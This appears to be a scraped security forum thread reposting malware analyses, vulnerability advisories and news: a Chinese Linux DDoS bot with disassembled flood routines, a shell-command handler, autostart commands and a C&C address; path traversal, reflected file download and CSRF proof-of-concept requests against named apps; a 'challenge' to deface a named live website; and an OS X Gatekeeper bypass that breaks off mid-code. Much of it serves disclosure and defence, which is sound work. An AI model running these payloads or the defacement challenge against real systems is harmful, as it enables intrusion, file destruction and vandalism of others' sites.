    The malware is not Elknot, IptabLesx or Billgates, is using AES to decrypt the target & CNC data, and contains 13 flooders (they added these one by one..so the next variant maybe more..). Originated from China, with the spreading method via ssh hacking. The malware firstly spotted few times in mid 2014. This sample is not the first sample/new one. This sample was served in the panel below, noted: just being released sample: Some notes: Flood mitigation can be applied to filter this specific header: (reff: .rodata:0x080ED38F && .rodata:0x080ED474) Accept-Language: zh-cn Accept-Language: zh-CN Autostart installation: sed -i -e '/%s/d' /etc/rc.local sed -i -e '2 i%s/%s' /etc/rc.local sed -i -e '2 i%s/%s start' /etc/rc.d/rc.local sed -i -e '2 i%s/%s start' /etc/init.d/boot.local Source files (unstripped) File : 'crtstuff.c' File : 'AES.cpp' File : 'main.cpp' File : 'eh_personality.cc' File : 'eh_alloc.cc' File : 'eh_exception.cc' File : 'eh_call.cc' File : 'pure.cc' File : 'eh_globals.cc' File : 'del_op.cc' File : 'eh_catch.cc' File : 'class_type_info.cc' File : 'allocator-inst.cc' File : 'string-inst.cc' File : 'eh_terminate.cc' File : 'eh_term_handler.cc' File : 'si_class_type_info.cc' File : 'eh_throw.cc' File : 'eh_unex_handler.cc' File : 'vterminate.cc' File : 'tinfo.cc' File : 'new_op.cc' File : 'eh_type.cc' File : 'cp-demangle.c' File : 'functexcept.cc' File : 'regex.cc' File : 'system_error.cc' File : 'functional.cc' File : 'future.cc' File : 'new_handler.cc' File : 'bad_typeid.cc' File : 'bad_alloc.cc' File : 'eh_ptr.cc' File : 'guard.cc' File : 'guard_error.cc' File : 'bad_cast.cc' File : 'ios_failure.cc' File : 'stdexcept.cc' File : 'condition_variable.cc' File : 'mutex.cc' File : 'thread.cc' File : 'unwind-dw2.c' File : 'unwind-dw2-fde-dip.c' File : 'libgcc2.c' File : 'unwind-c.c' Some PoC of AES: .text:0804832C ; AES::AES(unsigned char *) .text:0804832C public _ZN3AESC2EPh ;; .text:0804883E ; AES::KeyExpansion(unsigned char *, unsigned char [4][4]) .text:0804883E public _ZN3AES12KeyExpansionEPhPA4_A4_h ;; DDoS' (13 of them) functions: SYN_Flood, LSYN_Flood, UDP_Flood, TCP_Flood, DNS_Flood1, DNS_Flood2, DNS_Flood3, DNS_Flood4, CC_Flood, CC2_Flood, CC3_Flood, UDPS_Flood, UDP_Flood ;; DDOS 1 0x0804EE62: mov eax, [ebp+arg_0] mov eax, [eax+18Ch] cmp eax, 28h jg short 0x0804EE9D mov eax, [ebp+var_C] shl eax, 2 lea edx, id[eax] mov eax, [ebp+arg_0] mov [esp+0Ch], eax mov dword ptr [esp+8], offset _Z9SYN_FloodPv ; SYN_Flood(void *) mov dword ptr [esp+4], 0 mov [esp], edx call pthread_create jmp short 0x0804EEC8 ;; DDOS 2 0x0804EE9D: mov eax, [ebp+var_C] shl eax, 2 lea edx, id[eax] mov eax, [ebp+arg_0] mov [esp+0Ch], eax mov dword ptr [esp+8], offset _Z10LSYN_FloodPv ; LSYN_Flood(void *) mov dword ptr [esp+4], 0 mov [esp], edx call pthread_create ;; DDOS 3 0x0804EEED: mov eax, [ebp+var_C] shl eax, 2 lea edx, id[eax] mov eax, [ebp+arg_0] mov [esp+0Ch], eax mov dword ptr [esp+8], offset _Z9UDP_FloodPv ; UDP_Flood(void *) mov dword ptr [esp+4], 0 mov [esp], edx call pthread_create add [ebp+var_C], 1 ;; DDOS 4 0x0804EF3D: mov eax, [ebp+var_C] shl eax, 2 lea edx, id[eax] mov eax, [ebp+arg_0] mov [esp+0Ch], eax mov dword ptr [esp+8], offset _Z9TCP_FloodPv ; TCP_Flood(void *) mov dword ptr [esp+4], 0 mov [esp], edx call pthread_create add [ebp+var_C], 1 ;; DDOS 5 0x0804EF8D: mov eax, [ebp+var_C] shl eax, 2 lea edx, id[eax] mov eax, [ebp+arg_0] mov [esp+0Ch], eax mov dword ptr [esp+8], offset _Z10DNS_Flood1Pv ; DNS_Flood1(void *) mov dword ptr [esp+4], 0 mov [esp], edx call pthread_create add [ebp+var_C], 1 ;; DDOS 6 0x0804EFDD: mov eax, [ebp+var_C] shl eax, 2 lea edx, id[eax] mov eax, [ebp+arg_0] mov [esp+0Ch], eax mov dword ptr [esp+8], offset _Z10DNS_Flood2Pv ; DNS_Flood2(void *) mov dword ptr [esp+4], 0 mov [esp], edx call pthread_create add [ebp+var_C], 1 ;; DDOS 7 0x0804F02D: mov eax, [ebp+var_C] shl eax, 2 lea edx, id[eax] mov eax, [ebp+arg_0] mov [esp+0Ch], eax mov dword ptr [esp+8], offset _Z10DNS_Flood3Pv ; DNS_Flood3(void *) mov dword ptr [esp+4], 0 mov [esp], edx call pthread_create add [ebp+var_C], 1 ;; DDOS 8 0x0804F07D: mov eax, [ebp+var_C] shl eax, 2 lea edx, id[eax] mov eax, [ebp+arg_0] mov [esp+0Ch], eax mov dword ptr [esp+8], offset _Z10DNS_Flood4Pv ; DNS_Flood4(void *) mov dword ptr [esp+4], 0 mov [esp], edx call pthread_create add [ebp+var_C], 1 ;; DDOS 9 0x0804F0CD: mov eax, [ebp+var_C] shl eax, 2 lea edx, id[eax] mov eax, [ebp+arg_0] mov [esp+0Ch], eax mov dword ptr [esp+8], offset _Z8CC_FloodPv ; CC_Flood(void *) mov dword ptr [esp+4], 0 mov [esp], edx call pthread_create add [ebp+var_C], 1 ;; DDOS 10 0x0804F11D: mov eax, [ebp+var_C] shl eax, 2 lea edx, id[eax] mov eax, [ebp+arg_0] mov [esp+0Ch], eax mov dword ptr [esp+8], offset _Z9CC2_FloodPv ; CC2_Flood(void *) mov dword ptr [esp+4], 0 mov [esp], edx call pthread_create add [ebp+var_C], 1 ;; DDOS 11 0x0804F16D: mov eax, [ebp+var_C] shl eax, 2 lea edx, id[eax] mov eax, [ebp+arg_0] mov [esp+0Ch], eax mov dword ptr [esp+8], offset _Z9CC3_FloodPv ; CC3_Flood(void *) mov dword ptr [esp+4], 0 mov [esp], edx call pthread_create add [ebp+var_C], 1 ;; DDOS 12 0x0804F1BD: mov eax, [ebp+var_C] shl eax, 2 lea edx, id[eax] mov eax, [ebp+arg_0] mov [esp+0Ch], eax mov dword ptr [esp+8], offset _Z10UDPS_FloodPv ; UDPS_Flood(void *) mov dword ptr [esp+4], 0 mov [esp], edx call pthread_create add [ebp+var_C], 1 ;; DDOS 13 0x0804F20A: mov eax, [ebp+var_C] shl eax, 2 lea edx, id[eax] mov eax, [ebp+arg_0] mov [esp+0Ch], eax mov dword ptr [esp+8], offset _Z9UDP_FloodPv ; UDP_Flood(void *) mov dword ptr [esp+4], 0 mov [esp], edx call pthread_create add [ebp+var_C], 1 System command interface for execution.. this is bad...hacked server can be used as RAT .text:0x0804E6C2 ; Cmdshell(_MSGHEAD *) .text:0x0804E6C2 public _Z8CmdshellP8_MSGHEAD .text:0x0804E6C2 _Z8CmdshellP8_MSGHEAD proc near .text:0x0804E6C2 .text:0x0804E6C2 arg_0= dword ptr 8 .text:0x0804E6C2 .text:0x0804E6C2 push ebp .text:0x0804E6C3 mov ebp, esp .text:0x0804E6C5 sub esp, 18h .text:0x0804E6C8 mov eax, [ebp+arg_0] .text:0x0804E6CB add eax, 100h .text:0x0804E6D0 mov [esp], eax .text:0x0804E6D3 call system .text:0x0804E6D8 leave .text:0x0804E6D9 retn .text:0x0804E6D9 _Z8CmdshellP8_MSGHEAD endp .text:0x0804E6D9 We can expect CPU info with below format will be sent to remote: :` .text:0x080509E2 lea eax, [ebp+var_1110] .text:0x080509E8 add eax, 68h .text:0x080509EB mov [esp+4], eax .text:0x080509EF lea eax, [ebp+var_1110] .text:0x080509F5 add eax, 64h .text:0x080509F8 mov [esp], eax .text:0x080509FB call _Z10GetCpuInfoPjS_ ; GetCpuInfo(uint *,uint *) .text:0x08050A00 lea eax, [ebp+var_11D0] .text:0x08050A06 mov [esp], eax .text:0x08050A09 call sysinfo .text:0x08050A0E mov [ebp+var_24], eax .text:0x08050A11 mov eax, [ebp+var_11C0] .text:0x08050A17 shr eax, 14h .text:0x08050A1A mov [ebp+var_10A4], eax .text:0x08050A20 mov edx, [ebp+var_11C0] .text:0x08050A26 mov eax, [ebp+var_11BC] .text:0x08050A2C mov ecx, edx .text:0x08050A2E sub ecx, eax .text:0x08050A30 mov eax, ecx .text:0x08050A32 shr eax, 14h .text:0x08050A35 mov [ebp+var_10A0], eax .text:0x08050A3B lea ebx, [ebp+var_43C] .text:0x08050A41 mov eax, 0 .text:0x08050A46 mov edx, 100h .text:0x08050A4B mov edi, ebx .text:0x08050A4D mov ecx, edx .text:0x08050A4F rep stosd .text:0x08050A51 mov ebx, [ebp+var_10A0] .text:0x08050A57 mov ecx, [ebp+var_10A4] .text:0x08050A5D mov edx, [ebp+var_10A8] .text:0x08050A63 mov eax, [ebp+var_10AC] .text:0x08050A69 mov dword ptr [esp+20h], offset aHacker ; "Hacker" .text:0x08050A71 mov [esp+1Ch], ebx .text:0x08050A75 mov [esp+18h], ecx .text:0x08050A79 mov [esp+14h], edx .text:0x08050A7D mov [esp+10h], eax .text:0x08050A81 lea eax, [ebp+var_1110] .text:0x08050A87 mov [esp+0Ch], eax .text:0x08050A8B mov dword ptr [esp+8], offset aVersonexLinuxS ; "VERSONEX:Linux-%s|%d|%d MHz|%dMB|%dMB|%"... .text:0x08050A93 mov dword ptr [esp+4], 400h .text:0x08050A9B lea eax, [ebp+var_43C] .text:0x08050AA1 mov [esp], eax .text:0x08050AA4 call snprintf .text:0x08050AA9 mov eax, ds:MainSocket .text:0x08050AAE test eax, eax CNC: sin_port=htons(48080), sin_addr=inet_addr("119.147.145.215") Loc: 119.147.145.215||4134 | 119.144.0.0/14 | CHINANET | CN | CHINATELECOM.COM.CN | CHINANET GUANGDONG PROVINCE NETWORK DOWNLOAD Pass: infected Source
  11. Aerosol
    Document Title: =============== ES File Explorer v3.2.4.1 - Path Traversal Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1435 CVE-ID: ======= CVE-2015-1876 Release Date: ============= 2015-02-17 Vulnerability Laboratory ID (VL-ID): ==================================== 1435 Common Vulnerability Scoring System: ==================================== 7.8 Product & Service Introduction: =============================== ES File Explorer is a free all-in-one including a file manager & application & tasks, support for online storage spaces (Dropbox, Google Drive, SkyDrive, Box.net, Sugarsync, Yandex, Amazon S3), FTP & Samba client to explore the images, music, videos, documents and other files from your phone and your computer. It allows Android users around the world to manage their resources for free; you can see the files on your phone, access from anywhere and share them with others; it allows you to easily manage your photos or watch videos, stay connected on 3G, EDGE or WiFi, and share with friends. (Copy of the Vendor Homepage: https://play.google.com/store/apps/details?id=com.estrongs.android.pop ) Abstract Advisory Information: ============================== An independent vulnerability laboraotory researcher discovered a path traversal web vulnerability in the official ES File Explorer v3.2.4.1 mobile android web-application. Vulnerability Disclosure Timeline: ================================== 2015-02-17: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== ES APP GROUP Product: ES File Explorer - Mobile Web Application (Android) 3.2.4.1 Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ A Path Traveral web vulnerability has been discovered in the official in the official ES File Explorer v3.2.4.1 mobile android web-application. The security vulnerability allows a remote attacker to unauthorized request local files and device system paths to compromise the application or device. The vulnerability is located in the `content://com.estrongs.files/system/` path request with the <file> context. The vulnerability can be exploited by local or remote attackers without user interaction. The attacker needs to replace the sdcard path request in the com.estrongs.files/system with a malicious path request like ./etc/passwd ./etc/hosts and continues the request. The attack vector is located on the application-side of the service and the request is http. The security risk of the path traversal web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.8. Exploitation of the directory traversal web vulnerability requires no privileged application user account or user interaction. Successful exploitation of the vulnerability results in mobile application compromise Request Method(s): [+] POST & Sync Vulnerable Module(s): [+] content://com.estrongs.files/ Vulnerable Parameter(s): [+] path Affected Module(s): [+] content://com.estrongs.files/system/ Proof of Concept (PoC): ======================= The arbitrary code execution vulnerability can be exploited by remote attackers without user interaction or privileged application user account. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. --- PoC Session Logs --- Package: com.estrongs.android.pop Application Label: ES File Explorer Process Name: com.estrongs.android.pop Version: 3.2.4.1 Data Directory: /data/data/com.estrongs.android.pop APK Path: /data/app/com.estrongs.android.pop-2.apk UID: 10235 GID: [3003, 3002, 3001, 1015, 1028] Permissions: - android.permission.WRITE_SETTINGS - android.permission.CHANGE_WIFI_STATE - android.permission.CHANGE_NETWORK_STATE - android.permission.INTERNET - android.permission.SET_WALLPAPER - android.permission.ACCESS_NETWORK_STATE - android.permission.ACCESS_WIFI_STATE - com.android.launcher.permission.INSTALL_SHORTCUT - com.android.launcher.permission.UNINSTALL_SHORTCUT - android.permission.BLUETOOTH - android.permission.BLUETOOTH_ADMIN - android.permission.WRITE_EXTERNAL_STORAGE - android.permission.WRITE_MEDIA_STORAGE - android.permission.WAKE_LOCK - android.permission.READ_PHONE_STATE - android.permission.ACCESS_SUPERUSER - android.permission.VIBRATE - .PERMISSION - android.permission.CHANGE_WIFI_MULTICAST_STATE - android.permission.SYSTEM_ALERT_WINDOW - android.permission.GET_TASKS - android.permission.READ_EXTERNAL_STORAGE Defines Permissions: - None Activities: com.estrongs.android.pop.view.FileExplorerActivity com.estrongs.android.pop.app.compress.CompressionActivity com.estrongs.android.pop.app.compress.CompressionProxyActivity com.estrongs.android.pop.app.ESFileSharingActivity com.estrongs.android.pop.app.SaveToESActivity com.estrongs.android.pop.app.LocalFileSharingActivity com.estrongs.android.pop.app.PopVideoPlayer com.estrongs.android.pop.app.PopVideoPlayerProxyActivity com.estrongs.android.pop.app.AudioPlayerProxyActivity com.estrongs.android.pop.app.editor.PopNoteEditor com.estrongs.android.pop.app.FileChooserActivity com.estrongs.android.pop.app.ESContentChooserActivity com.estrongs.android.pop.app.ESRingtoneChooserActivity com.estrongs.android.pop.app.ESWallPaperChooserActivity com.estrongs.android.pop.app.DownloaderActivity com.estrongs.android.pop.app.BrowserDownloaderActivity com.estrongs.android.pop.app.PopRemoteImageBrowser com.estrongs.android.pop.ftp.ESFtpShortcut com.estrongs.android.pop.app.ShowDialogActivity com.estrongs.android.pop.app.AppCheckUpdateList com.estrongs.android.pop.app.DefaultWindowSetting com.estrongs.android.pop.app.DocumentExtModifyList com.estrongs.android.pop.app.TransitActivity Broadcast(Receiver): com.estrongs.android.pop.app.AudioPlayerService$MediaButtonReceiver com.baidu.share.message.ShareReceiver com.estrongs.android.pop.EnableOEMConfig com.estrongs.android.pop.app.InstallMonitorReceiver com.estrongs.android.pop.app.StartServiceReceiver Services: com.estrongs.android.pop.bt.OBEXFtpServerService Permission: null Providers: Authority: com.estrongs.files Read Permission: null Write Permission: null Content Provider: com.estrongs.android.pop.app.FileContentProvider Multiprocess Allowed: False Grant Uri Permissions: True read content://com.estrongs.files/system/../../../../../sdcard/<file> Read file hosts read content://com.estrongs.files/system/etc/hosts 127.0.0.1 localhost Solution - Fix & Patch: ======================= In the AndroidManifest.xml file of each application that contains a content provider, it was recommended that read and write permissions are set. Vulnerable code: com.estrongs.files Read Permission: null Write Permission: null android:exported="true" change "true" to "false" When the value is "false", only components of the same application or applications with the same user ID can start the service or bind to it. <provider android:authorities="com.estrongs.files" android:exported="true" android:grantUriPermissions="true" android:name="com.estrongs.android.pop.app.FileContentProvider"/> Fixed code: <provider android:authorities="com.estrongs.files" android:exported="false" android:grantUriPermissions="true" android:name="com.estrongs.android.pop.app.FileContentProvider"/> read content://com.estrongs.files/system/etc/hosts Permission Denial: opening provider com.estrongs.android.pop.app.FileContentProv ider from ProcessRecord{4192d1a0 32050:com.mwr.dz:remote/u0a216} (pid=32050, uid =10216) that is not exported from uid 10235 Security Risk: ============== The security risk of the path traversal web vulnerability in the android app is estimated as high. (CVSS 7.8) Credits & Authors: ================== Hadji Samir [s-dz@hotmail.fr] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ Source
  12. Aerosol
    Reflected File Download RFD is a web attack vector that enables attackers to gain complete control over a victims machine by virtually downloading a file from a trusted domain. Read more: http://dl.packetstormsecurity.net/papers/presentations/eu-14-Hafif-Reflected-File-Download-A-New-Web-Attack-Vector.pdf
  13. Aerosol
    Samhain is a file system integrity checker that can be used as a client/server application for centralized monitoring of networked hosts. Databases and configuration files can be stored on the server. Databases, logs, and config files can be signed for tamper resistance. In addition to forwarding reports to the log server via authenticated TCP/IP connections, several other logging facilities (e-mail, console, and syslog) are available. Tested on Linux, AIX, HP-UX, Unixware, Sun and Solaris. Changes: Added non-existent file to the regression test config. Multiple bug fixes. Link download: here Link project: Samhain Labs | samhain
  14. Aerosol
    Oren Hafif reported a new kind of attack called Reflected File Download (https://www.blackhat.com/eu-14/briefings.html#reflected-file-download-a-new-web-attack-vector) in Black Hat Europe 2014 conference. More details about the attack you can found in his public presentation: https://www.blackhat.com/docs/eu-14/materials/eu-14-Hafif-Reflected-File-Download-A-New-Web-Attack-Vector.pdf. Google and Bing have already fixed the vulnerability but I've found the same vulnerability in AOL Search Website. A malicious user could send the link below to a victim that you download a malicious batch file from autocomplete.search.aol.com domain. In the link below we have search for 'iramar "||calc||' using the AOL autocomplete domain. The browser will encode the double quotes but the server will escape it (\") and return inside the json on the body response. Since the response has the header "Content-Type: application/x-suggestions+json;charset=UTF-8" the browser will automatically try to download the reflected file. Chrome didn't try to download the file but Internet Explorer and Firefox will. http://autocomplete.search.aol.com/autocomplete/get;calc.bat?q=iramar"||calc||&it=ws-landing&dict=en_us_search&count=8&output=json REQUEST GET http://autocomplete.search.aol.com/autocomplete/get;calc.bat?q=iramar%22||calc||&it=ws-landing&dict=en_us_search&count=8&output=json HTTP/1.1 Host: autocomplete.search.aol.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: ... Connection: keep-alive RESPONSE HTTP/1.1 200 OK Date: Tue, 21 Oct 2014 10:30:34 GMT Server: Apache-Coyote/1.1 Content-Type: application/x-suggestions+json;charset=UTF-8 Content-Language: en-US Content-Length: 24 Keep-Alive: timeout=5, max=10 Connection: Keep-Alive ["iramar\"||calc||", []] Source
  15. TheOne
    Product Description Complete Windows Backup Software for PCs, Laptops, and Workstations. Backup: easily and safely save everything, including system, disk, partition and individual files. Restore: fast and reliable disaster recovery, supporting sector alignment and selective restoration. Clone: step-by-step transfer OS or upgrade hard drive without reinstalling Windows and applications. Utilities: command line backup, merge images, backup schemes, make bootable discs, VSS, etc. Backup Features: File Backup: back up your files and folders automatically or manually to ensure you don’t lose anything from now on. System Backup: one-click back up Windows, settings, applications and the files required for computer to boot. Disk & Partition Backups: flexibly choose entire hard drive or separate partitions to backup, including dynamic disk volumes. Schedule Backup: set up a schedule to back up your system and all files automatically, supporting daily, weekly, and monthly. Incremental & Differential Backups: on the basis of a full backup, save time and storage space by only backing up changed files. Backup Scheme: automatically delete the obsolete backup images based on specified value – the age and the number. Command Line Backup: make backups from command prompt or by creating a batch (.dat) file for unattended processing. Backup to Internal & External Storage Devices: support SCSI, IDE, SATA hard drives, external USB hard drives and all flash drives. Backup to CD/DVD: support CD-R/RW, DVD-R/RW, DVD+R/RW, BD-R. Backup to NAS/Share Network: set Network-Attached Storage (NAS) or share network as the destination path to easily backup. Restore Features: File Restore: Restore backed-up versions of files & folders that are lost, damaged, or changed accidentally, like emails, music, movies, etc. System Restore: Return your computer’s system files and programs to an earlier state when everything was working properly. Disk & Partition Restore: Completely recover the entire hard disk, partition or dynamic disk volume to the point you ever backed up. Selective File Restore: Just recover individual files what you need from disk & partition images without restoring the entire image to save time. Clone Features: Clone Disk: copy a hard drive to another one or solid state drive (SSD) without reinstalling Windows and applications. Clone Partition: create an exact duplication of your system or data partition, and transfer it to another place. Utilities & Tools: Merge Backup Images Combine full backup and its chained incremental backups into a single backup for better management. Check and Explore Images Verify data integrity of image file to ensure it can be restored successfully. Mount image file as a virtual partition to browse the contents in Windows Explorer. Encrypt and Compress Images Protect image file from unauthorized access with a password. Set the level of compression used for backing up process to save time or save storage space. Comment and Split Backups Add a comment for backup image so that it can be identified easily. Large backups can be split into multiple smaller image files or split to fit for fixed length media. Split and Delete Backups Large backups can be split into multiple smaller image files or split to fit for fixed length media. Delete a backup task or together with its backup image files. Export/Import Tasks and Logs Management Export all backup tasks stored in an XML file which can be imported later. View what operations the program has done and record the events that occur during a backup process. Email Notifications and VSS Send backup completion status to your email by using your own mail server or AOMEI SMTP server. Microsoft Volume Shadow (VSS) allows you to back up files that are in use, especially for open and locked files backup. Create Bootable Rescue Media Make Windows PE & Linux bootable CD/DVD or USB flash drive. It can be useful to recover if your computer cannot boot. Support manually add additional drivers when create Windows PE bootable media. YOU CAN ALSO TRY THESE FREEWARE: AOMEI PE Builder PE Builder - Create Bootable USB or CD/DVD based on Windows PE with AOMEI PE Builder This freeware helps you make a bootable environment based on Windows PE without installing AIK/WAIK easily, which integrates a set of tools that enables you to boot up your computer for easy maintenance and fast recovery tasks when the native system is corrupted or cannot be used. AOMEI OneKey Recovery One Key Recovery - Create a Factory Restore Partition with AOMEI OneKey Recovery This is also a freeware, as its name suggests, it can create a factory restore partition and ONE KEY backup system for all types of desktops and laptops. AOMEI PXE Boot Free PXE Boot Software and Network Booting Tool for Windows 8.1/8/7/XP/Vista This freeware aims to boot your multiple computers from an image via network. Its mode is Client/Server. It is easy to use. It also supports synchronous boot of multiple computers. One of the advantages is that it supports bootable micro-system created by you. -> Download <-Deal Expires in: EXPIRED!
  16. Guest
    #Level : Medium. #Target : h~~p://www.webinvestgroup.com.br #List: h~~p://www.webinvestgroup.com.br/wp-includes/x.txt For solve this challengen put the nickname in the file "x.txt" Please replace "~~" with "tt"
  17. Aerosol
    Security researchers with Russian anti-virus company Doctor Web have examined a complex, multi-purpose backdoor for Linux. This malicious program can execute various commands issued by intruders such as to mount DDoS attacks and to perform a wide range of other malicious tasks. To spread the new Linux backdoor, dubbed Linux.BackDoor.Xnote.1, criminals mount a brute force attack to establish an SSH connection with a target machine. Doctor Web security researchers believe that the Chinese hacker group ChinaZ may be behind this backdoor. Once Linux.BackDoor.Xnote.1 gets in, it checks to see whether its copy is already running in the infected system. If it is, the backdoor exits. The malware will only be installed in a system if it has been launched with superuser (root) privileges. During installation, the malware creates a copy of itself in the /bin/ directory in the form of a file called iptable6. It then deletes the original file that was used to launch it. Linux.BackDoor.Xnote.1 also searches the /etc/init.d/ directory for a script that starts with the line "#!/bin/bash" and adds another line to it so that the backdoor will be launched automatically. The program uses the following routine to exchange data with the intruders' control server. To obtain configuration data, the backdoor looks for a special string in its body—the string points to the beginning of the encrypted configuration block, then decrypts it and starts sending queries to control servers on the list until it finds a responding server or until the list ends. Both the backdoor and the server use the library zlib to compress the packets they exchange. First, Linux.BackDoor.Xnote.1 sends information about the infected system to the server. It then goes into standby mode and awaits further instructions. If the command involves carrying out some task, the backdoor creates a separate process that establishes its own connection to the server through which it gets all the necessary configuration data and sends the results of the executed task. Thus, when commanded to do so, Linux.BackDoor.Xnote.1 can assign a unique ID to an infected machine, start a DDoS attack on a remote host with a specific address (it can mount SYN Flood, UDP Flood, HTTP Flood and NTP Amplification attacks), stop an attack, update its executable, write data to a file, or remove itself. The backdoor can also perform a number of actions with files. Having received the appropriate command, Linux.BackDoor.Xnote.1 sends information about the file system of the infected computer (the total number of data blocks in the file system and the number of free blocks) to the server and stands by for other directives which can include: List files and directories inside the specified directory. Send directory size data to the server. Create a file in which received data can be stored. Accept a file. Send a file to the command and control (C&C) server. Delete a file. Delete a directory. Signal the server that it is ready to accept a file. Create a directory. Rename a file. Run a file. In addition, the backdoor can run a shell with the specified environment variables and grant the C&C server access to the shell, start a SOCKS proxy on an infected computer, or start its own implementation of the portmap server. The signature of this malware has been added to the Dr.Web virus database, so systems protected by Dr.Web Anti-virus for Linux are safe from this backdoor. Source
  18. Aerosol
    Document Title: =============== Wireless File Transfer Pro 1.0.1 - (Android) CSRF Remote Command Execution (Creat, Delete) Release Date: ============= 2015-02-10 Product & Service Introduction: =============================== Wireless File Transfer Pro is the advanced version of Wireless File Transfer. (Copy of the Vendor Homepage: https://play.google.com/store/apps/details?id=com.lextel.WirelessFileTransferPro ) Affected Product(s): ==================== Wireless File Transfer Pro 5.9.5 - (Android) Web Application 1.0.1 Lextel Technology Exploitation Technique: ======================= Remote Severity Level: =============== Medium Request Method(s): [+] [GET] Vulnerable Module(s): [+] browse Vulnerable Parameter(s): [+] fileExplorer.html? Affected Module(s): [+] Index of Documents (http://localhost:8888) Technical Details & Description: ================================ cross site request forgery has been discovered in the Wireless File Transfer Pro 1.0.1 Android mobile web-application. The mobile web-application is vulnerable to a combination of cross site request forgery and local command injection attacks. Proof of Concept (PoC): ======================= Creat New Folder <img src="http://192.168.1.2:8888/fileExplorer.html?action=create&type=folder&folderName=test1" width="0" height="0" border="0"> --- PoC Session Logs [GET] (Execution) --- GET /fileExplorer.html?action=create&type=folder&folderName=test1 HTTP/1.1 Host: 192.168.1.2:8888 User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://192.168.1.2:8888/fileExplorer.html?action=brower&path=/sdcard Connection: keep-alive HTTP/1.1 200 OK Cache-control: no-cache Content-length: 4 <a href="#" onclick="actionBrower('/sdcard/test1')">test1</a></td></td><td width="24%"></td><td width="24%">2015-02-09 18:12:19</td><td width="15%"> Delete File, Folder <img src="http://192.168.1.2:8888/fileExplorer.html?action=deleteFile&fileName=test""width="0" height="0" border="0"> --- PoC Session Logs [GET] (Execution) --- GET /fileExplorer.html?action=deleteFile&fileName=test HTTP/1.1 Host: 192.168.1.2:8888 User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://192.168.1.2:8888/fileExplorer.html?action=brower&path=/sdcard Connection: keep-alive HTTP/1.1 200 OK Cache-control: no-cache Content-length: 30 Reference: http://localhost:8888/ Security Risk: ============== The security risk of the cross site request forgery issue and command injection vulnerability is estimated as medium. (CVSS 4.4) Credits & Authors: ================== Hadji Samir s-dz@hotmail.fr Source
  19. MasterLight

    .

    MasterLight posted a topic in Programare

    .
  20. Aerosol
    # Exploit Title: OS X Gatekeeper bypass Vulnerability # Date: 01-27-2015 # Exploit Author: Amplia Security Research # Vendor Homepage: www.apple.com # Version: OS X Lion, OS X Mountain Lion, OS X Mavericks, OS X Yosemite # Tested on: OS X Lion, OS X Mountain Lion, OS X Mavericks, OS X Yosemite # CVE : CVE-2014-8826 Advisory URL : http://www.ampliasecurity.com/advisories/os-x-gatekeeper-bypass-vulnerability.html Gatekeeper is a feature available in OS X Lion v10.7.5 and later versions of OS X. Gatekeeper performs checks on files and applications downloaded from the Internet to prevent execution of supposedly malicious and untrusted/unsigned code. Gatekeeper provides three different settings: - Mac App Store (Only apps that came from the Mac App Store can open) - Mac App Store and identified developers (Only apps that came from the Mac App Store and identified developers using Gatekeeper can open) - Anywhere The default setting is "Mac App Store and identified developers". This setting prevents execution of any code that was not downloaded from the Mac App Store and that was not digitally signed by a Developer ID registered with Apple. For example, If the user downloads an application from an untrusted source and double-clicks on the application to execute it, OS X Gatekeeper will prevent its execution with the following warning message: "<AppName> can't be opened because it is from an unidentified developer." (For more information on OS X Gatekeeper, see http://support.apple.com/kb/ht5290) We found an attacker can bypass OS X Gatekeeper protections and execute unsigned malicious code downloaded by the user, even if OS X Gatekeeper is configured to only allow execution of applications downloaded from the Mac App Store (the highest security setting). The exploitation technique is trivial and requires Java to be installed on the victim's machine. OS X Gatekeeper prevents execution of downloaded Java Jar (.jar) and class (.class) files, but this verification can be bypassed. For example: - Create a JAR file containing the code to be executed For example, File AmpliaTest.java: public class AmpliaTest { public static void main(String[] args) { try { 